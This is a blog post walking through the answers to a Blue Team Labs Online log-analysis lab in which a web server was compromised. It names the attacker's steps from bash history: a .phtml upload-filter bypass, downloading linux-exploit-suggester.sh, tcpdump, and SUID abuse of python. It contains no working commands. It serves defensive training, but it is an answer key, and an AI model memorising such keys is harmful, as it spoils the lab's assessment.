Log Analysis - Privilege Escalation BTLO Lab Solving

Assalamu Alaikum Wa Rahmatullah. How are you hackers?? May allah bless me and you.

Today I am writing this blog/article after solving Log Analysis — Privilege Escalation. I wrote this based on How I Solve this lab.

Lab

Before Read this, Try to solve lab. If you stuck then come here for help.

Ok Now lets move on to the lab.

First Read the Scenario.

A server with sensitive data was accessed by an attacker and the files were posted on an underground forum. This data was only available to a privileged user, in this case the ‘root’ account. Responders say ‘www-data’ would be the logged in user if the server was remotely accessed, and this user doesn’t have access to the data. The developer stated that the server is hosting a PHP-based website and that proper filtering is in place to prevent php file uploads to gain malicious code execution. The bash history is provided to you but the recorded commands don’t appear to be related to the attack. Can you find what actually happened?

In the asset section they give me a zip file. I download the zip file and Inside the zip file I got two text file.

Assets

When I look at the BTLO.txt file, There is nothing crazy.

POC

But when I Look at the the bash_history file I found all the answer. To solve this lab we don’t need any tools except Terminal.

Now lets Solve the Lab.

What user (other than ‘root’) is present on the server?

Answer :

daniel

Note : view the bash_history file and you will get the answer.

POC

What script did the attacker try to download to the server?

Answer :

linux-exploit-suggester.sh

Note : view the bash_history file and you will get the answer.

POC

What packet analyzer tool did the attacker try to use?

Answer :

tcpdump

Note : view the bash_history file and you will get the answer.

POC

What file extension did the attacker use to bypass the file upload filter implemented by the developer?

Answer :

.phtml

Note : view the bash_history file and you will get the answer.

Based on the commands run by the attacker before removing the php shell, what misconfiguration was exploited in the ‘python’ binary to gain root-level access? 1- Reverse Shell ; 2- File Upload ; 3- File Write ; 4- SUID ; 5- Library load

Answer :

4

Note : Look at the image down below, If you know about linux privilege escalation then you should be able to find that this process is SUID. Or we can say that this process used SUID to try to switch into super user or administrator.

POC

Congratulation!!!!!!!!!!!!!!! You successfully Solve the lab.

Thanks for reading. Hope this article/blog will help you. If you have any question or doute feel free to ask. And please follow my medium it’s free and you can always change your mind.

Here is my social Link :

Linkedin : https://www.linkedin.com/in/r3dw4n4hm3d/

GitHub : https://github.com/r3dw4n48m3d

Website : https://r3dw4n48m3d.github.io/Portfolio/

YouTube : https://www.youtube.com/@R3DW4NA8M3D